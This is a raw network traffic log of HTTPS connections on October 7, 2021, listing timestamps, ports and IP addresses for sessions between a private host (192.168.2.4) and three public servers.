Oct 7, 2021 15:51:53.815459013 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.815773964 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.864435911 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.865029097 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.865149975 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.869128942 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.869148970 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.869620085 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.871556044 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.872658014 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.872699976 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.872724056 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.873512983 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.875221014 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.895807028 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.895874023 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.895979881 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.895996094 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.896603107 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.896637917 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.896652937 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.896744013 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.910243034 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.910329103 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.910455942 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.910741091 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.910800934 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.910904884 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.911371946 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.911418915 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.911739111 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.911756992 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.962801933 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.962918997 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.963053942 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.963181019 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.974682093 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.974725962 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.975219965 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.975305080 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.975714922 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.978885889 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.978949070 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.979361057 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.979441881 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.979881048 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.997137070 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.997296095 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:53.997333050 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:53.997395039 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.001486063 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.001600981 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.001621962 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.001637936 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.001691103 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.001740932 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.029947996 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.030000925 CEST	443	49838	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.030011892 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.030061960 CEST	49838	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.065248966 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.065284014 CEST	443	49837	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.065295935 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.065342903 CEST	49837	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.070724964 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.070801973 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.070908070 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.071073055 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.071120977 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.071201086 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.071902037 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.071928978 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.072788000 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.072823048 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.112685919 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.112720013 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.112859964 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.113095999 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.113778114 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.113799095 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.114342928 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.114366055 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.118201017 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.118241072 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.118882895 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.118908882 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.151458979 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.151515007 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.151593924 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.151618004 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.151623011 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.151650906 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.151675940 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.151694059 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.151845932 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.151845932 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.151911020 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.151973009 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.153299093 CEST	49841	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.153326035 CEST	443	49841	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:54.153825045 CEST	49842	443	192.168.2.4	18.156.0.31
Oct 7, 2021 15:51:54.153856039 CEST	443	49842	18.156.0.31	192.168.2.4
Oct 7, 2021 15:51:55.173315048 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.173346996 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.173368931 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.173437119 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.173475981 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.173491001 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.173635006 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.173670053 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.173721075 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.173832893 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.173847914 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.173913956 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.174216986 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.174245119 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.174335957 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.175915956 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.175929070 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.175945044 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.175945044 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.175952911 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.175964117 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.176856041 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.176857948 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.176870108 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.176902056 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.177371979 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.177402973 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.177479029 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.204262972 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.204301119 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.235526085 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.235730886 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.237169027 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.237391949 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.237526894 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.237663031 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.239886999 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.240793943 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.246786118 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.247313976 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.254898071 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.255026102 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.258059978 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.258095026 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.259385109 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.259412050 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.260094881 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.263128042 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.263164043 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.263475895 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.263554096 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.263844967 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.269603014 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.269653082 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.270030022 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.270122051 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.270142078 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.292805910 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.292912006 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.292953968 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.292995930 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.293003082 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.293073893 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.293194056 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.293214083 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294114113 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294122934 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294142962 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294229031 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294233084 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294245005 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294332981 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294368029 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294390917 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294397116 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294399977 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294409990 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294455051 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294456005 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294461012 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294469118 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294537067 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294599056 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294687986 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.294747114 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.294756889 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.296786070 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.296829939 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.296866894 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.296899080 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.296900034 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.296925068 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.296942949 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.296977043 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.296991110 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.297000885 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.297020912 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.297036886 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.297056913 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.297065973 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.297097921 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.297142029 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.297441959 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.297528982 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.297543049 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.297595978 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.297604084 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.297678947 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.298372984 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.298424959 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.298491001 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.298506021 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.298557997 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.298659086 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.299174070 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.299276114 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.299294949 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.299309015 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.299339056 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.299375057 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.300128937 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.300232887 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.300246000 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.302110910 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.307539940 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.318587065 CEST	49847	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.318635941 CEST	443	49847	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.328183889 CEST	49849	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.328214884 CEST	443	49849	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.328845978 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.328887939 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.330351114 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.331080914 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.334806919 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.334840059 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.334876060 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.334884882 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.335266113 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.337726116 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.337862968 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.364645958 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364697933 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364741087 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364754915 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.364773035 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364809990 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364845991 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364847898 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.364854097 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.364861965 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364917040 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364932060 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.364939928 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.364947081 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364979982 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.364999056 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.365005016 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.365010977 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.365044117 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.365076065 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.365084887 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.365092039 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.365097046 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.365169048 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.365175009 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.365181923 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.365401983 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.365852118 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.365900993 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.365988970 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.366056919 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.366065025 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.366067886 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.392503023 CEST	49851	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.392534971 CEST	443	49851	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.395672083 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.395710945 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.395721912 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.395731926 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.396210909 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.396306038 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424099922 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424164057 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424196005 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424223900 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424252987 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424262047 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424285889 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424310923 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424324036 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424352884 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424369097 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424376965 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424403906 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424410105 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424434900 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424443007 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424472094 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424510956 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.424519062 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.424568892 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.425502062 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.425571918 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.425586939 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.425609112 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.425640106 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.425679922 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434458017 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434564114 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434588909 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434603930 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434712887 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434756994 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434767962 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434776068 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434782028 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434792042 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434818983 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434847116 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434853077 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434906006 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.434914112 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.434968948 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.448748112 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.448821068 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.448852062 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.448857069 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.448875904 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.448879004 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.448945999 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.449134111 CEST	443	49850	151.101.1.44	192.168.2.4
